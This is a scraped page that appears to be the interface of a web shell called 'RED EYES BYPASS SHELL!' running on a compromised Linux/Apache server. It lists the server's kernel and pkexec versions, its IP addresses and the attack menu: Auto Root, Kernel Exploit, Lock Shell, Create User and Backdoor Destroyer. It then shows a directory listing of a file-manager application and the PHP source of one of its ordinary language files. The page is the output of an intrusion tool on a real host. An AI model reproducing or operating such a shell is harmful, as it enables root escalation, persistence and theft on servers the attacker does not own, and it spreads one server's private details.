Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
admin /
app /
kod /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
archiveLib
[ DIR ]
drwxr-xr-x
Downloader.class.php
5.08
KB
-rw-r--r--
FileCache.class.php
6.21
KB
-rw-r--r--
Hook.class.php
2.93
KB
-rw-r--r--
I18n.class.php
2.91
KB
-rw-r--r--
ImageThumb.class.php
8.7
KB
-rw-r--r--
KodArchive.class.php
10.12
KB
-rw-r--r--
Mcrypt.class.php
4
KB
-rw-r--r--
PluginBase.class.php
8.05
KB
-rw-r--r--
imageGdBMP.class.php
7.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : I18n.class.php
<?php function LNG($key){ if (func_num_args() == 1) { return I18n::get($key); } else { $args = func_get_args(); array_shift($args); return vsprintf(I18n::get($key), $args); } } class I18n{ private static $loaded = false; private static $lang = NULL; public static $langType = NULL; public static function defaultLang(){ if(isset($GLOBALS['config']['settings']['language'])){ return $GLOBALS['config']['settings']['language']; } $lang = "en"; $arr = $GLOBALS['config']['settingAll']['language']; $langs = array(); if(!$arr) return 'zh-CN'; foreach ($arr as $key => $value) { $langs[$key] = $key; } $langs['zh'] = 'zh-CN'; //增加大小写对应关系 $langs['zh-tw'] = 'zh-TW'; $acceptLanguage = array(); if(!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])){ $httpLang = 'en'; }else{ $httpLang = str_replace("_","-",strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE'])); } preg_match_all('~([-a-z]+)(;q=([0-9.]+))?~',$httpLang,$matches,PREG_SET_ORDER); foreach ($matches as $match) { $acceptLanguage[$match[1]] = (isset($match[3]) ? $match[3] : 1); } arsort($acceptLanguage); foreach ($acceptLanguage as $key => $q) { if (isset($langs[$key])) { $lang = $langs[$key];break; } $key = preg_replace('~-.*~','', $key); if (!isset($acceptLanguage[$key]) && isset($langs[$key])) { $lang = $langs[$key];break; } } return $lang; } public static function getAll(){ self::init(); return self::$lang; } public static function getType(){ self::init(); return self::$langType; } public static function init(){ if(self::$loaded !== false){ return; } $cookieLang = 'kodUserLanguage'; if (isset($_COOKIE[$cookieLang])) { $lang = $_COOKIE[$cookieLang]; }else{ $lang = self::defaultLang(); //setcookie_header($cookieLang,$lang, time()+3600*24*100); } $lang = str_replace(array('/','\\','..','.'),'',$lang); //兼容旧版本 if($lang == 'zh_CN') $lang = 'zh-CN'; if($lang == 'zh_TW') $lang = 'zh-TW'; if(isset($GLOBALS['config']['settings']['language'])){ $lang = $GLOBALS['config']['settings']['language']; } $langFile = LANGUAGE_PATH.$lang.'/main.php'; if(!file_exists($langFile)){//allow remove some I18n folder $lang = 'en'; $langFile = LANGUAGE_PATH.$lang.'/main.php'; } self::$langType = $lang; self::$lang = include($langFile); self::$loaded = true; $GLOBALS['L'] = self::$lang; } public static function get($key){ self::init(); if(!isset(self::$lang[$key])){ return $key; } if (func_num_args() == 1) { return self::$lang[$key]; } else { $args = func_get_args(); array_shift($args); return vsprintf(self::$lang[$key], $args); } } /** * 添加多语言; * @param [type] $args [description] */ public static function set($array){ self::init(); if(!is_array($array)) return; foreach ($array as $key => $value) { self::$lang[$key] = $value; } } }
Close